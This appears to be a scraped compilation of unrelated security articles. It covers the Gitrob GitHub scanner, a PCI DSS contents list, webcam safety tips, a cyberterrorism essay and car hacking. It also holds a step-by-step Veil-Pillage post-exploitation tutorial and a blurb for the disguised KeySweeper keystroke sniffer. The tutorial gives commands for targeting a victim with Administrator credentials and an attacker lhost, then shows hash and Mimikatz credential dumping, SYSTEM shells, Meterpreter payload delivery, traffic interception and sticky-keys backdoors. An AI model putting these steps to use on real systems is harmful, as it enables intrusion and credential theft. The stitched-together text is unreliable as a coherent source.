Aerosol

Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it’s also a trove of potentially sensitive company and project information that’s likely to warrant attention from hackers. An application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. Gitrob is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn’t meant for public consumption. Its developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub’s public API to query a Github organization’s list of public members. “When the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,” Henriksen told Threatopst. “The contents of the repositories are never downloaded to the machine, it simply uses GitHub’s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub’s servers.” Henriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually. “All the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file’s database record, before it is saved to the database,” Henriksen said. “Right now, Gitrob actually only contains one observer which will flag files that match patterns of interesting files, but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.” Security analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public. “A security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,” Henriksen said. “The current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.” Henriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said. “I am not aware of any tool that specifically targets GitHub organizations like Gitrob does,” Henriksen said. “People have been finding sensitive files with GitHub’s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.” Installation instructions and requirements can be found on his Github page. Source

Table of Contents Document Changes ........................................................................................................................................................................... 2 Introduction and PCI Data Security Standard Overview ................................................................................................................. 5 PCI DSS Resources............................................................................................................................................................................................ 6 PCI DSS Applicability Information .................................................................................................................................................... 7 Relationship between PCI DSS and PA-DSS.................................................................................................................................... 9 Applicability of PCI DSS to PA-DSS Applications................................................................................................................................................. 9 Applicability of PCI DSS to Payment Application Vendors.................................................................................................................................... 9 Scope of PCI DSS Requirements.................................................................................................................................................... 10 Network Segmentation.......................................................................................................................................................................................11 Wireless…………… ...........................................................................................................................................................................................11 Use of Third-Party Service Providers / Outsourcing ............................................................................................................................................12 Best Practices for Implementing PCI DSS into Business-as-Usual Processes........................................................................... 13 For Assessors: Sampling of Business Facilities/System Components ....................................................................................... 15 Compensating Controls................................................................................................................................................................... 16 Instructions and Content for Report on Compliance..................................................................................................................... 17 PCI DSS Assessment Process........................................................................................................................................................ 17 Detailed PCI DSS Requirements and Security Assessment Procedures..................................................................................... 18 Build and Maintain a Secure Network and Systems........................................................................................................................................19 Requirement 1: Install and maintain a firewall configuration to protect cardholder data ...................................................................................19 Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters ....................................................28 Protect Cardholder Data...................................................................................................................................................................................34 Requirement 3: Protect stored cardholder data...............................................................................................................................................34 Requirement 4: Encrypt transmission of cardholder data across open, public networks ..................................................................................44 Maintain a Vulnerability Management Program...............................................................................................................................................46 Requirement 5: Protect all systems against malware and regularly update anti-virus software or programs.....................................................46 Requirement 6: Develop and maintain secure systems and applications.........................................................................................................49 Implement Strong Access Control Measures..................................................................................................................................................61 Requirement 7: Restrict access to cardholder data by business need to know................................................................................................61 Requirement 8: Identify and authenticate access to system components........................................................................................................64 Read more: https://www.pcisecuritystandards.org/documents/PCI_DSS_v3.pdf

The recent revelations about a Russian website offering links to various live streaming web cameras and baby monitors have made people truly petrified of using such gadgets. However treacherous it might sound, the truth is that the best advice to all users who have suddenly decided to stop benefiting from the cool features of web cams is not to give them up altogether. Instead, the best thing for somebody to do is to learn as many details as possible on webcam safety. In this way, everyone will be able to enjoy the pros of these devices without worrying about their cons. The Information Commissioner’s Office has published a blog post commenting on the vigilance of people, which is crucial towards empowering their defensive line against hacks and potential threats online. The post was written by Simon Rice, Group Manager for Technology, explaining the basic guidelines that everyone should follow on the subject. We are going to dig a little deeper and try to fully comprehend what leads to security breaches in our webcams and how we can prevent webcam hacking effectively. It does not require any special knowledge or expertise to get thorough protection against the dangers of the web. So, let’s get started! Why Access is Granted to Webcams It is true that webcams are connected to the Internet, just like many other devices and even household appliances. The Internet of Things has been increasing in popularity and therefore we are directly connected to the web and have our devices monitored remotely, thanks to wireless Internet connections. Now, the most important thing to keep in mind is the fact that even hackers need your login information in order to reach out to your webcam. It is saddening how many people continue using the default login info sent out by the manufacturers of each webcam. In this way, the hacker can easily circumvent the security layering beneath a commonly used password and username. It could be easier for people to be forced to change this login information after setting up, but unfortunately there is no such a necessity; this leads to many cases of webcams having poor login data and hackers being in a truly beneficial position. Do I Need to Dispose of Webcams? In pursuit of digital safety, it makes total sense why many people have thought of throwing their webcams away. Others have placed plaster or pieces of fabrics on the cameras that are installed on their laptops or other devices. However, you do not need to be that drastic for maintaining your peace of mind. It is truly advisable, though, that you level up your protection and think twice prior to engaging in something that may lead to your device being compromised. Below, we are going to have a closer look at the details that make a huge difference and result in having your webcam shielded properly. Keep Your Webcam Safe Online Be Considerate about Passwords: We have stated above that you need to change the default password and username of your webcam after it’s been shipped. Still, this does not automatically make you impenetrable for hackers. You need to be really considerate when it comes to choosing the proper password. Do not use passwords that can be easily guessed or passwords that include information linking back to you. Use strong passwords that differ from other accounts of yours. In addition, you should in no way reveal those passwords via email, SMS or of course on the phone. Last but not least, be sure to update your passwords on a regular basis and check for two-step authentication. Set up Different User Accounts: If there are many people using a specific computer, set up different user accounts that lead to the respective data of each user. In this way, you eliminate the chances of having the whole computer compromised, and you rest assured that everyone has access only to the things that matter to them, without digging into other stuff. Be Realistic: Do not place a webcam in your children’s bedroom and do not expose things that you wish to conceal to your webcam. As a result, even if somebody succeeds in accessing your webcam, no actual harm will be done. Check for any indication that your webcam is on, so as to identify the hacking promptly and initiate management of the damage. Engage in Security Software: It is imperative that you have installed the latest version of your anti-virus software and any additional security software of value. Be sure to run regular scans to determine whether malware has been installed on your computer and requires your attention. Securing your webcam from hackers means that you are always alert to the latest threats in Trojan malware and other viruses and spyware. A firewall is also a must-have for you, in avoidance of any serious trouble. Adjust Webcam Security Settings: As soon as you have received your webcam and are about to install it, read through the manual and get to the security settings of the product. This will allow you to see whether or not there is an option of turning remote viewing off. Upon doing so, you instantly make things more difficult for hackers who would otherwise be prompt to intercept your footage. There may be other cool security settings you can play with, so do not overlook this step. Beware of Techies: Sometimes wolves come in sheep’s clothing and thus you need to be scholastic with techies offering their help to your computer. Their interest may be genuine, however, there is a chance that they are mainly interested in hacking your system and gaining remote access to your webcam. Is it worth the risk? We think not! Avoid Suspicious Attachments and Links: Since your email is the most vulnerable and weakest link in the chain of the Internet, you ought to be wary of any attachment or link sent over to you. Especially when the email comes from an untrustworthy source, this is definitely a red flag for you to watch out for. Double check the sender and make sure that you only click on secured data. If you follow the instructions displayed above and pay adequate attention toward enhancing your webcam safety, you will have no problem and you will still be able to reap the benefits of your precious gadgets. You do not have to deprive yourself of anything, as long as you consider the threats that come with it and you are determined to deal with them efficiently. Source

While a terrorist using the Internet to bring down the critical infrastructures the United States relies on makes an outstanding Hollywood plot, there are flaws in the execution of this storyline as an actual terrorist strategy. Conway (2011) calls out three limitations on using cyber-related activities for terrorists: Technological complexity, image, and accident (Against Cyberterrorism, 2011, p. 27). Each is important to consider. While critical infrastructures may make a tempting target and threat actor capabilities are certainly increasing (Nyugan, 2013), it is a complicated process to attack something of that magnitude. It is precisely the interconnectedness of these two disparate parts that make them a target, however. Nyugan (2013) calls them cyber-physical systems (CPS): “A physical system monitored or controlled by computers. Such systems include, for example, electrical grids, antilock brake systems, or a network of nuclear centrifuges” (p. 1084). In Verton’s (2003) imaginary narrative, the target of the Russian hackers, the SCADA system, is a CPS. However, Lewis (2002) argues the relationship between vulnerabilities in critical infrastructures (such as MAE-East) and computer network attacks is not a clear cut as first thought (p. 1). It is not simply a matter of having a computer attached to a SCADA system and thus the system is can now be turned off and society goes in a free fall of panic and explosions and mass chaos. The first idea Conway (2011) posits reduces to the notion that information technology is difficult in most cases. There are reasons it takes veritable armies of engineers and analysts to make these complex systems interact and function as intended. However, there are a limited number of terrorists with the necessary computer skills to conduct a successful attack (pp. 27-28). Immediately the argument turns to hiring external assistance from actual computer hackers (as most journalists and Hollywood scriptwriters do). Conway (2011) dismisses that idea, correctly, as a significant compromise of operational security (p. 28). The US Department of Defense as defines operational security, or OPSEC: A process of identifying critical information and analyzing friendly actions attendant to military operations and other activities to: identify those actions that can be observed by adversary intelligence systems; determine indicators and vulnerabilities that adversary intelligence systems might obtain that could be interpreted or pieced together to derive critical information in time to be useful to adversaries, and determine which of these represent an unacceptable risk; then select and execute countermeasures that eliminate the risk to friendly actions and operations or reduce it to an acceptable level (US Department of Defense, 2012). In the context of this paper, letting outside profit-motivated technicians into the planning and execution phase of a terrorist plot would be risky for conservative-minded individuals such a religious terrorists (Hoffman, 2006). As the number of people who are aware of a plot increases, the potential number of people who can leak operational details of the plot increases exponentially. It is for this reason Verton’s (2003) scenario is most improbable. The second concern Conway (2011) notes is one of audience. Recalling the definition of terrorist put forth by Hoffman (2006), terrorists need to generate publicity to achieve their goals: they need to create a climate of fear through violence or the threat of violence. Simply attacking something and having no one notice it is not an operational success for a terrorist. Terrorists need to have their grievances known (Nacos, 2000, p. 176). The terrorist act needs to be witnessed, such as the planes crashing into the World Trade Center or the hostage taking in Munich. in order to generate the necessary level of discourse to affect the goals the terrorist has in mind. Unfortunately, injecting code into a DNS server or shutting down Amazon.com does not generate the required intensity of chaos modern terrorists require (Conway, Against Cyberterrorism, 2011, p. 28). This leads to Conway’s (2011) third point: the accident. The United States relies heavily on computer and information systems. However, if a system goes offline in today’s world, users are just as likely to suspect a system failure or accident as anything else is (p. 28). As stated previously, this would be unacceptable to the terrorist organization. In order to generate a sufficient amount of concern on the part of the population, a series of cascading cyber-attacks would have to occur. Recalling Conway’s (2011) first concern about complexity, multiple system attacks of the necessary intensity and frequency are unlikely. While this might appear as merely an academic exercise, a review of the Global Terrorism Database maintained by the National Consortium for the Study of Terrorism and Responses to Terrorism at the University of Maryland shows only two incidents under the search term “cyber” (Global Terrorism Database Search Results). The first involved two men in Morocco who got into an argument at an Internet café with the café owner about viewing bomb-making materials. During the altercation, an actual bomb strapped to one of the men accidentally exploded killing the would-be bomber and wounding three others. The second involved a pay phone in Hong Kong that was wired with explosives and detonated. A search of telecommunications facilities as targets in the database showed similar results: Explosions or arson, not the use of computers as a weapon system. There are side effects of the mischaracterization of cyberterrorism by the media and popular culture. In the United States, the Uniting (and) Strengthening America (by) Providing Appropriate Tools Required (to) Intercept (and) Obstruct Terrorism Act of 2001, or PATRIOT Act, was passed in the immediate aftermath of the September 11, 2001 attacks. It has two key provisions designed to counter potential cyberterrorist activity and increase the punishment for computer crimes (US Government, 2001). Section 814 of the PATRIOT Act enumerated specifically the goals of deterring and preventing cyberterrorism. It increased the minimum prison terms for unauthorized access to a computer system, regardless of activity once in the system i.e. mixing criminal activity and cyberterrorism under a cyberterrorism section heading (§ 814.a.4). Additionally, the law amended “the Federal sentencing guidelines to ensure that any individual convicted of a violation of section 1030 of title 18, United States Code, can be subjected to appropriate penalties, without regard to any mandatory minimum term of imprisonment” (§ 814.f). In other words, simply being convicted of unauthorized access to a computer system allowed a federal judge (who most likely was not familiar with the nuances of cyber threats and threat + actors) to assume the worst and lock someone up for a very long time. Outside of the United States, others have made similar decisions regarding cyber threats and the law. In the United Kingdom, Parliament changed its Terrorism Act so that using a computer system or threatening to use a computer system that interferes or disrupts another computer system is now considered terrorism (Conway, Cyberterrorism: Hype and Reality, 2007, p. 91). Of concern of course is who makes the determination as to what constitutes disruption. Right now, that falls to Scotland Yard. That leaves a sour taste and no small amount of anxiety for human rights workers and other civil libertarians (p. 91). Since the advent of the Internet, life has changed remarkable for citizens of the United States and the world. Unfortunately, this pace of change brings fear. When the legitimate danger terrorists create is married to our dependence on technology, it is understandable how people become concerned. This new sense of panic is the fear of terrorists using the computer systems we depend on against us. Fortunately, the evidence of cyberterrorism very limited thus far. Of course, an assumption is made that cyberterrorism is properly defined as a non-state organization that creates politically motivated destruction to information, computer systems and/or computer programs leading to violence or the threat of violence (Conway, What is Cyberterrorism?, 2002). Any implication of state-sponsorship of cyber-attacks is outside the scope of this paper and could constitute an act of war (Shiryaev, 2012, p. 150). An analysis of the issue has demonstrated that cyberterrorism as a strategy for actual terrorists has been over-hyped through the media, academia, and popular literature. This exaggeration of capabilities has led to several instances of questionable law made by people who do not understand the intricacies involved in launching a cyberterrorist attack. Rather, they acted out of fear and doubt. More cybersecurity professionals need to counter such sentiments by public and public officials to ensure actual threats are mitigated and unsubstantiated ones are given less priority and fewer resources. Only then can the more important threats be dealt with. Source

1. Introduction In the past, cars and computers did not have many touching points. Nowadays, modern cars contain numerous computers. As Bruce Emaus, the chairman of SAE International, stated: “It would be easy to say the modern car is a computer on wheels, but it’s more like 30 or more computers on wheels.” The complexity of modern cars can be understood by comparing their software with the software used on the space ship (Apollo 11) that put humans on the moon. While Apollo 11 had 145,000 lines of computer code, modern cars have more than 100 million lines of code. Although in-car computers ensure the comfort and the safety of the occupants of the car, they may be hacked by criminals. Car thefts may be one of the reasons for hacking cars. Criminals stealing cars by using hacking methods can hide very well from law enforcement institutions, because they do not leave evidence that would be left by a forcible entry. The purpose of this article is to examine the information security vulnerabilities of the following elements of the modern cars: door locks (Section 2), in-vehicle infotainment systems (Section 3), MP3 players (Section 4), systems for on-board diagnostics (Section 5), and telematics systems (Section 6). Finally, a conclusion is drawn (Section 7). These five elements of the modern cars are displayed on the diagram below. 2. Door locks The door locks of most modern cars can be opened by a radio frequency remote keyless system. The users of such systems can open the car by pressing a button on a remote control key fob. The first car with a radio frequency remote keyless system was the French Renault Fuego. A radio frequency remote keyless system can be hacked by spoofing the signal from a wireless key fob. In this context, the term “spoofing” refers to emitting a fake signal. It should be noted that hacking of a car by spoofing the signal from a wireless key fob is not a hypothetical threat. Such hacks have already been reported. Below, I provide two examples demonstrating successful hacking of door locks. Silvio Cesare, a security researcher, invented a technique allowing anyone to spoof the signal from a wireless key fob and unlock the car. The hacking process takes a few minutes. According to Casare, the technique “effectively defeats the security of the keyless entry.” A video of the hacking process can be found at the following URL: Watch This Wireless Hack Pop a Car's Locks in Minutes | WIRED . Srdjan Capkun, Aurélien Francillon, and Boris Danev, scientists working for ETH Zurich in Switzerland, successfully opened the door locks of 10 cars by intercepting and relaying signals from the cars. The attack used by them works irrespectively of the cryptography and the protocols used by the remote keyless system. 3. In-vehicle infotainment systems The term “in-vehicle infotainment system” means a collection of hardware devices installed into transportation devices that display navigation and other information and provide audio or video entertainment (e.g., listening to audio files and playing video games). Most in-vehicle infotainment systems allow the user to install mobile applications developed by third parties. In case a mobile app contains malware, it can affect the in-vehicle infotainment system. In this regard, it is worth mentioning that in 2013 there were over one million malicious applications for download on the Android market only. FAKEINST and OPFAKE were the most popular malware programs. FAKEINST disguises as a legitimate program and sends text messages without a user’s permission. OPFAKE also disguises as a legitimate program, but, instead of sending text messages, it opens webpages that contain malicious files. As a response to the threats associated with mobile apps, many car manufacturers decided to allow the users of their cars to install only certain pre-approved apps on the in-vehicle infotainment systems. While such a solution may increase the information security of car users, it significantly restricts consumer choice. The car users may “jailbreak” the in-vehicle infotainment systems in order to remove the restrictions imposed by the car manufacturers. The term “jailbreaking” refers to circumventing security measures of a mobile operating system with the aim to install unauthorized software. 4. MP3 players Virtually all modern cars have an MP3 player. The MP3 player can be used by hackers as an entry point for accessing the computers of the other components of the car. The MP3 player is an especially attractive place for hacking attacks because people generally do not consider digital music files as potential carriers of malware. As Stefan Savage, a professor at the University of California, noted, “it’s hard to think of something more innocuous than a song.” Although the digital music files are considered by some as “harmless” files, the researchers at UCSD and the University of Washington demonstrated hacking of a car MP3 player. By adding code to a digital music file, they were able to infect a song burned to CDR with a malware. When played on the car’s MP3 player, the infected song changed the software of the MP3 player in such a way as to allow the hackers to access the other components of the car. A McDonald’s promotion in Japan is a real-life example of the information security risks associated with digital music files. During the promotion, McDonald’s gave to people 10,000 USB-stick MP3 players containing ten free songs. The MP3 players also contained a Trojan horse (QQPass) that was capable of stealing data from the computers of the users. In this case, the infection seems to have been caused by third parties, not by McDonald’s. McDonald’s apologized for the case and set up a help line. 5. Systems for on-board diagnostics The systems for on-board diagnostics provide the vehicle owner or the technician access to the status of various components of the vehicle. Such access can be obtained by connecting to a port which can be found in the car. The port can be used not only by owners of the car and technicians, but also by hackers willing to infect the computers of the car with malware. Researchers at The Center for Automotive Embedded Systems Security (CAESS) proved such a possibility by installing a malware program onto the car’s CAN bus through the (On-Board Diagnostics) OBD-II port. After the installation, the malware was able to move the windshield wipers and activate the brakes. In 2012, The Register stated that on-board diagnostics bypass tools were imported in Europe and Australia from China and Eastern Europe. The tools can be used for reprogramming a blank key and stealing a car. David Stupples, a professor at City University London, stated in relation to the tools that: “Crooks only need to monitor a person using the key or interrogate the key fob to get enough information to decipher the key.” In the same context, the Australian Theft Reduction Council chief Ray Carroll pointed out that: “Not long ago insurers were safe in saying a car with an Australian-standard immobiliser that was stolen without the keys was potential fraud. Now you can’t really say that because there’s good evidence where OBDs are able with a bit of black-market software to recode the immobiliser module to a key you’ve brought along.” It should be pointed out that car manufacturers have recently started using encryption in order to prevent information security attacks on the systems for on-board diagnostics. 6. Telematics systems The telematics systems are in-car electronic systems which can perform various functions, including, but not limited to, disabling the vehicle in case of a theft, notifying the police in the event of a crash, and displaying diagnostic information. By gaining access to the telematics systems, hackers can activate or deactivate the functions of those systems. There are two scenarios of attacks on the telemetics systems. In the first scenario, a mechanic installs malware on a telematics system. In the second scenario, a hacker receives unauthorized access to the wireless networks the telematics system is plugged into. A research paper written by computer scientists from the University of Washington and the University of California warns that the second scenario is not merely theoretical. More particular, the paper states that: “In our car we identified no fewer than five kinds of digital radio interfaces accepting outside input, some over only a short range and others over indefinite distance. While outside the scope of this paper, we wish to be clear that vulnerabilities in such services are not purely theoretical. We have developed the ability to remotely compromise key ECUs in our car via externally-facing vulnerabilities, amplify the impact of these remote compromises using the results in this paper, and ultimately monitor and control our car remotely over the Internet.” 7. Conclusion At present, there are not many reported cases of hacked cars. However, because hacking of cars may be a relatively simple activity, the number of such cases may significantly increase in the near future. The following quote from the above-mentioned paper clearly indicates the easiness of hacking a car: “In starting this project we expected to spend significant effort reverse-engineering, with non-trivial effort to identify and exploit each subtle vulnerability. However, we found existing automotive systems—at least those we tested—to be tremendously fragile. ” In order to prevent the appearance of car hacking cases, car manufacturers need to implement up-to-date information security measures. These measures will not only protect car users, but also pave the way toward the introduction of new self-driving cars, which will be entirely dependent on technology. The car manufacturers that do not ensure the information security of their cars risk losing significant market share, because car users are seriously worried about the security and privacy of their cars. A Harris Interactive poll indicated in 2012 that 76% of 2,634 respondents consider the in-car connectivity as a dangerous aspect of modern cars. 55% of the respondents stated that car manufacturers went too far in including interconnected technologies in their vehicles. * The author would like to thank Rasa Juzenaite for her invaluable contribution to this article. References 1. Barry, K., ‘Can Your Car Be Hacked: Hack to the Future’, Car and Driver, July 2011. Available at Can Your Car Be Hacked? - Feature - Car and Driver . 2. Brooks, R., ‘Introduction to Computer and Network Security: Navigating Shades of Gray‘, CRC Press, 2013. 3. Covert, A., ‘Now Cars Are Vulnerable to Malware’, Gizmodo, 15 March 2011. Available at Now Cars Are Vulnerable to Malware? . 4. Dimov, D., ‘Legality of Jailbreaking Mobile Phones’, InfoSec Institute, 16 December 2014. Available at Legality of Jailbreaking Mobile Phones - InfoSec Institute . 5. Greenberg, A., ‘Watch This Wireless Hack Pop a Car’s Locks in Minutes’, 8 April 2014, Wired.com. Available at Watch This Wireless Hack Pop a Car's Locks in Minutes | WIRED . 6. Ippolito, J., ‘Hack someone’s car with a malicous tune’, NMDnet, 4 February 2011. Available at Hack someone’s car with a malicious tune » UMaine NMDNet . 7. Kelly, G., ‘Report: 97% of Mobile Malware is On Android. This is The Easy Way You Stay Safe’, Forbes, 24 March 2014. Available at Report: 97% Of Mobile Malware Is On Android. This Is The Easy Way You Stay Safe - Forbes . 8. Leyden, J., ‘Got a BMW? Thicko thieves can EASILY NICK IT WITH $30 box’, The Register, 17 September 2012. Available at Got a BMW? Thicko thieves can EASILY NICK IT with $30 box • The Register . 9. Motovalli, J., ‘The Dozens of Computers That Make Modern Cars Go (and Stop)’, New York Times, 4 February 2010. Available at http://www.nytimes.com/2010/02/05/technology/05electronics.html?_r=1& . 10. Naone, E., ‘Car Theft by Antenna: Researchers beat automatic locking and ignition systems’, 6 january 2011, MIT Technology Review. Available at Car Theft by Antenna | MIT Technology Review . 11. O’Connor, F., ‘Survey: Drivers like in-car Internet, worry about safety, privacy’, Computerworld, 2 August 2012. Available at Survey: Drivers like in-car Internet, worry about safety, privacy | Computerworld . 12. Osborne, C., ‘Malicious apps, mobile malware reaches 1 million mark’, ZDNet, 1 October 2013. Available at Malicious apps, mobile malware reaches 1 million mark | ZDNet . 13. Pagliery, J., ‘Your Car is a giant computer – and it can be hacked’, CNN, 2 June, 2014. Available at Your car is a giant computer - and it can be hacked - Jun. 1, 2014 . 14. Stevens, C., ‘McDonalds’ free Trojan: “Would you like malware with that?”‘, CNET, 17 October 2006. Available at McDonalds' free Trojan: "Would you like malware with that?" - CNET . 15. ‘$30 device available online blamed for spike in car thefts in Queensland’, news.com.au, 18 August 2012. Avaiable at $30 device available online blamed for spike in car thefts in Queensland . Source

Veil-Pillage is a part of the Veil-Framework which comes handy when performing post-exploitation. It consists of a number of modules which can be used to perform different tasks on target machine(s). It has a Metasploit msfconsole-like interface and commands, so you won’t feel alien when using it. Install the complete Veil-Framework from the following GitHub link: https://github.com/Veil-Framework/Veil git clone https://github.com/Veil-Framework/Veil.git After git-clone has completed, go inside the “Veil” directory and run the “update.sh” shell script. It will take some time to download and setup everything. When everything has been setup, go to the “Veil/Veil-Pillage/” directory and run the “Veil-Pillage.py” Python script. Set the target and the login credentials in Veil-Pillage. set targets 10.0.0.11 set creds Administrator:admin You can also specify multiple targets and credentials by separating them with a comma (,) in the same line. Set a global value of “lhost“, which is the IP address of the attacking machine, using the below command: setg lhost 10.0.0.14 At the time of writing this article, there were 7 categories with total of 60 modules in Veil-Pillage. Categories and Modules in Veil-Pillage: Credentials Enumeration Impacket credentials/autograbcredentials/hashdumpcredentials/mimikatz credentials/powerdump enumeration/domain/enum_domainenumeration/domain/group_hunterenumeration/domain/netview enumeration/domain/netview_results enumeration/domain/powerview enumeration/domain/powerview_results enumeration/domain/query_domainsid enumeration/domain/query_group enumeration/domain/query_users enumeration/host/credential_validation enumeration/host/detect_powershell enumeration/host/detect_powershell_install enumeration/host/enum_host enumeration/host/etw_results enumeration/host/etw_wininet enumeration/host/user_hunter impacket/psexec_shellimpacket/smb_hostfileimpacket/smb_shell impacket/smbexec_shell Management Payload Delivery Persistence PowerSploit management/check_uacmanagement/disable_rdpmanagement/disable_uac management/download_file management/enable_proxy management/enable_rdp management/enable_uac management/force_logoff management/force_reboot management/force_shutdown management/run_command payload_delivery/exe_deliverypayload_delivery/powershell_injectorpayload_delivery/powershell_shell payload_delivery/powershell_stager Tab completion for modules: Use “credentials/autograb” to get hashes of users on the victim machine: Note that “force_method” has been set to none, which means this module will first run this module using the PowerShell script “autograb.ps1“. If this fails, then it will use the binary technique. You can see that attacker’s IP address has been set to “10.0.0.14?, which we did earlier using the “setg lhost” command. Press Enter (Option (Y)) to execute the module. In the above screenshot, the first highlighted area shows that PowerShell has been found on the victim machine and it is being used to execute the AutoGrab module. Then the PowerShell script is downloaded and installed from the second highlighted HTTP path, which is hosted on the attacker machine by Veil-Pillage itself. After the module has executed, a screen similar to the one below is shown. It shows the location of the file containing the output of the AutoGrab module execution (file name is a timestamp of module execution). Pressing “y” will show you the output of the command: This module can be used to dump not just local system hashes but also other hashes and plaintext passwords from memory and publicly known password files. Similar to this module are “credentials/hashdump” and “credentials/powerdump” modules, which can dump hashes of local system users. The next module is one of the very popular modules used in post-exploitaiton phases of a penetration testing engagement, “credentials/mimikatz“: Executing the module and waiting for it to complete and get output: And read the output of the executed module: The Mimikatz module dumped the login hashes for two logged-in users, “Administrator” and “slave”. One of the biggest advantages of using Mimikatz is that it is executed from memory only, and nothing is written on disk. It can also dump other data like Kerberos tickets if they are stored in memory. The Enumeration category contains modules using which domain and host enumeration can be performed. It allows an attacker to gather more information about the victim and the infrastructure of which it is part by using the data gathered from it. If you have a collection of login credentials, then “enumeration/host/credential_validation” can be used to validate those credentials against the victim machine. A sample screenshot of the same can be seen below: If you have a number of hosts, then “set targets target1,target2,target3,…” can be used to set multiple targets along with credentials set using “set creds username1:password1,username2:password2,…“. Detailed information about the victim machine can be obtained using the “enumeration/host/enum_host” module: This module accepts an “out_file” option, which allows you to specify the file name in which output of this module will be stored temporarily on victim machine. The output of this module after being received on the attacker machine is stored in a text file (not shown on screen because of its huge content): This text file contains the following information in an organized manner: ipconfig (network connectivity – IP address, interfaces, etc.) ARP table User accounts Currently logged-in users Netstat (TCP & UDP) Currently running processes System information Earlier I had mentioned that some modules have an option “force_method” with values none, powershell & binary. To find out if PowerShell is installed and accessible on the victim machine or not, Veil-Pillage has a module “enumeration/host/detect_powershell“. Similar to this module is “enumeration/host/detect_powershell_install” which only finds if PowerShell is installed on the victim machine or not. Two interesting enumeration modules are “enumeration/host/etw_results” and “enumeration/host/etw_wininet“. ETW stands for Event Tracing for Windows and these modules are used to fetch event logs from Windows and to fetch cookies & post parameter data of the Internet Explorer browser only. These modules can prove to be very useful if some sensitive information like authenticated cookies can be fetched from the victim machine. But unfortunately, these modules were not working for me. Getting an interactive shell from the victim machine can easily be done using the “impacket/psexec_shell” module. Since I have the credentials of the Administrator account on the victim machine, and this module uses psexec, I am getting a highest privileged SYSTEM shell: This module makes getting an interactive shell ridiculously easy and saves a lot of time when you just want to have a quick shell (which is just a module click away in Veil-Pillage). Have you ever used the “smbclient” utility, which is used to connect to remote SMB services used to access files and perform other activities? Very similar to that is the next module, “impacket/smb_shell“, which gives an interactive SMB shell on the victim machine. A successful SMB shell is shown below with some sample commands, which show you have full-fledged SMB shell access on the target machine. Another shell access module is “impacket/smbexec_shell“. This module gives shell access to the victim machine, but is semi-interactive. Being a psexec shell gave a SYSTEM shell access. It is called semi-interactive for a reason: if you execute a command with very large output like “systeminfo“, it will crash the shell, but the command does get executed on the victim machine. So running a delete all files command will get executed on the server if you want to create havoc for no reason. To make changes or enable/disable settings and some services on the target machine, we have the Management category of Veil-Pillage modules. User Access Control (UAC) is protection implemented in Windows, and you can check if it is enabled on the victim machine or not using “management/check_uac” module: As you can see below, on my victim machine it is disabled right now: UAC can be enabled using the “management/enable_uac” module: Let us again check UAC status using the “management/check_uac” module: To get remote desktop access to the victim machine and to enable remote desktop (if disabled), we have a useful module, “management/enable_rdp“. To intercept traffic originating from the victim machine, a very useful management module is “management/enable_proxy“, which can be used to enable a system proxy that points to an attacker’s controlled proxy machine. I have configured my Burp Suite to listen on 10.0.0.14:8080 as a proxy. This module at present is showing an error message. But it is a very useful module which can be used to intercept all traffic. But it will show an error message for SSL websites since the SSL Certificate will fail to be validated by the victim’s web browser. The Payload Delivery category contains those Veil-Pillage modules which can be used to upload and execute a specific payload like a Meterpreter executable or any Windows executable file. One of the modules of this category is “payload_delivery/exe_delivery” which can be used to upload an executable file and execute it on the victim machine. For this demo I am generating a Meterpreter EXE file using Veil-Evasion (part of the Veil-Framework). In the below image, you can see Veil-Evasion has generated a Meterpreter EXE along with a resource file (.RC). Configure the module to upload the generated EXE file and execute it on the victim machine: After executing the EXE file, a cleanup file path is also shown, which we will use in just a minute. We can check out msfconsole, which we had earlier called using the resource file: msfconsole -r /root/veil-output/handlers/veilmsf1_handler.rc When we are done with the Meterpreter execution and want to clean up the files from the victim machine, we simply have to use the “cleanup” command from Veil-Pillage with the path to the cleanup script shown above: cleanup /root/veil-output/pillage/exe_delivery/01.04.2015.224337.pc The Persistence category consists of those modules which can help you maintain access to compromised machines. One helpful task to maintain access is to create a new user account. The “persistence/add_local_user” module can perform this task easily: The user account has been created when this module is executed. And the best part is that you will also get a cleanup script to remove it when you want to. Use the “net users” command in the “management/run_command” module to get a user list or “credentials/hashdump” module to dump the user list and corresponding login hashes. One of the old hacks but still a popular backdoor is the Sticky Keys hack. In this hack, the Sticky Keys executable “sethc.exe” (C:WindowsSystem32) is backdoored or replaced by another EXE. When a user presses the SHIFT key 5 times, this executable is called. This hack has been made automated in Veil-Pillage using the “persistence/sticky_keys” and “persistence/sticky_keys_exe” modules. The former will show a CMD when sticky keys are called, whereas the latter can be used to replace it with any other EXE of your choice like a Meterpreter EXE. One advantage of both these modules is that they have a cleanup script too, using which you can restore the original “sethc.exe” file. The last category of Veil-Pillage is PowerSploit. The scripts in this category have already been covered in the “PowerShell Toolkit – PowerSploit” article. I request you to please refer to it. Also note that one article is not enough to cover all the modules of Veil-Pillage. At the time of this writing, there were 60 modules. Many of the useful modules have been discussed here, but I have faith that you will try others if and when needed or for knowledge purposes. Source

KeySweeper is a stealthy Arduino-based device, camouflaged as a functioning USB wall charger, that wirelessly and passively sniffs, decrypts, logs and reports back (over GSM) all keystrokes from any Microsoft wireless keyboard in the vicinity. Download: https://github.com/samyk/keysweeper

